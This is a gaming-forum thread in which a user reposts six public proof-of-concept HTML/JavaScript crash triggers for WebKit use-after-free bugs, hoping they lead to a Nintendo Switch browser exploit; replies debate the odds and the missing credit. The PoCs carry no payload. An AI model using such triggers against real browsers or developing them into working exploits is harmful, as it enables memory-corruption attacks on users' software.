[Hacking] [Suggestion] WebKit CVEs published on Nov. 22nd

ZiggyDeer (OP, joined Dec 20, 2014):

Hello GBATemp! I recently discovered a whole bunch of proof-of-concept use-after-free exploits posted by the Google Security Team that target Apple WebKit. Since they are only about a week old in terms of their publication, I figured there hasn't been a patch for them on the Switch yet. I will put those PoCs down at the bottom of this post.

Now, before you start bringing the hype up, I want to remind you that these are only proofs-of-concept and will not do anything at the moment besides maybe crashing the browser. Not all use-after-free vulnerabilities can be used to gain privileges or anything like that, and there's also ARM TrustZone that you have to worry about. However, the folks over at Google did publish a total of 8 UAF exploits within WebKit, so maybe there is hope.

Let's hope a more experienced developer will try and pick this up. I've been trying to use QEMU to emulate an AArch64 Debian distro with a Cortex-A57 CPU, but it's just too slow. So I figured the better solution was to buy a Raspberry Pi 3 and debug on that, which should come in on Thursday.

Anyway, here is the HTML/JS for the 8 PoC exploits. I hope this can become useful!

HTML:
<script>
function jsfuzzer() {
  textarea1.setRangeText("foo");
  textarea2.autofocus = true;
  textarea1.name = "foo";
  form.insertBefore(textarea2, form.firstChild);
  form.submit();
}
function eventhandler2() {
  for(var i=0;i<100;i++) {
    var e = document.createElement("input");
    form.appendChild(e);
  }
}
</script>
<body onload=jsfuzzer()>
<form id="form" onchange="eventhandler2()">
<textarea id="textarea1">a</textarea>
<object id="object"></object>
<textarea id="textarea2">b</textarea>
HTML:
<style>
.class9 { column-span: all; }
</style>
<script>
function f() {
  document.execCommand("indent", false);
  var var00031 = window.getSelection().setBaseAndExtent(sum,16,null,6);
  f();
}
</script>
<body onload=f()>
<pre style="column-count: 78; -webkit-user-modify: read-write">
<details>
<summary id="sum" class="class9">
<content id="htmlvar00040">
HTML:
<script>
function go() {
  iframe.name = "foo";
  var form = document.createElement("form");
  iframe.src = "data:text/html,foo";
  form.submit();
  window.onbeforeunload = f;
}
function f() {
  document.head.appendChild(del);
}
 
</script>
<body onload=go()>
<del id="del">
<iframe id="iframe"></iframe>
HTML:
<script>
function eventhandler1() {
try { txt.appendChild(kg); } catch(e) { }
}
 
function eventhandler2() {
try { anim.appendChild(kg); } catch(e) { }
}
 
function eventhandler3() {
try { table.scrollIntoView(true); } catch(e) { }
}
 
</script>
<table id="table"></table>
<form>
<keygen id="kg" autofocus="autofocus">
</form>
<svg>
<animate id="anim" attributeName="text-anchor" from="middle" to="inherit" onbegin="eventhandler1()" />
<text id="txt" onload="eventhandler3()">
<font color="white"></font>
<select onfocus="eventhandler2()" autofocus="autofocus">
<textarea>a</textarea>
<iframe onload="eventhandler1()"></iframe>
HTML:
<style>
#colgrp { display: table-footer-group; }
.class1 { text-transform: capitalize; display: -webkit-box; }
</style>
<script>
function go() {
  textarea.setSelectionRange(30,1);
  option.defaultSelected = true;
  col.setAttribute("aria-labeledby", "link");
}
</script>
<body onload=go()>
<link id="link">
<table>
<colgroup id="colgrp">
<col id="col" tabindex="1"></col>
<thead class="class1">
<th class="class1">
<textarea id="textarea" readonly="readonly"></textarea>
<option id="option"></option>
HTML:
<script>
function jsfuzzer() {
  circle.nearestViewportElement.innerHTML = "foo";
  document.execCommand("selectAll", false);
}
function eventhandler1() {
  clippath.appendChild(image);
}
function eventhandler2() {
  svg.appendChild(details);
}
function eventhandler3() {
  document.execCommand("fontName", false, "foo");
  button.autofocus = true;
  window.addEventListener("DOMNodeInserted", eventhandler2);
  div.appendChild(q);
}
</script>
<body onload=jsfuzzer()>
<q id="q">
<button id="button" onfocus="eventhandler1()">b</button>
</q>
<image id="image">
<details id="details" open="true">
<keygen autofocus="autofocus">
</details>
<div id="div"></div>
<svg id="svg">
<clipPath id="clippath" onload="eventhandler3()" />
<circle id="circle" />
</svg>
</html>
 
Deleted User (Guest):

Hope to God a 4.01 exploit is announced, but since it patches a big vulnerability used to execute homebrew, most likely not; and since this is a proof-of-concept, it's a 50-50 chance that something will happen.
 

Beerus (joined May 3, 2017):

Hope to God a 4.01 exploit is announced, but since it patches a big vulnerability used to execute homebrew, most likely not; and since this is a proof-of-concept, it's a 50-50 chance that something will happen.
Highly doubt anything will happen soon, but hey, it's not bad to keep on dreaming.

coolio my dude
 
Deleted User (Guest):

New CVEs come in heaploads on a constant basis. Copy-pasting example PoCs from around the web and failing to mention it's not your code can also be kind of underhanded (especially with the way you posted this). And lastly, if someone randomly Googling around and copy-pasting other people's code on GBAtemp is aware of a possible vulnerability, then it's already well known.

At least just post the link instead of formatting it to make it seem like your work:

https://www.exploit-db.com/exploits/43176/
 

MeowMeowMeow (joined Apr 1, 2016):

New CVEs come in heaploads on a constant basis. Copy-pasting example PoCs from around the web and failing to mention it's not your code can also be kind of underhanded (especially with the way you posted this). And lastly, if someone randomly Googling around and copy-pasting other people's code on GBAtemp is aware of a possible vulnerability, then it's already well known.

At least just post the link instead of formatting it to make it seem like your work:

https://www.exploit-db.com/exploits/43176/

Dude, read his first sentence... calm down lmao, he is not stealing someone's work. Ooooh the irony tho.
Hello GBATemp! I recently discovered a whole bunch of proof-of-concept use-after-free exploits posted by the Google Security Team that target Apple WebKit. Since they are only about a week old in terms of their publication, I figured there hasn't been a patch for them on the Switch yet. I will put those PoCs down at the bottom of this post.
 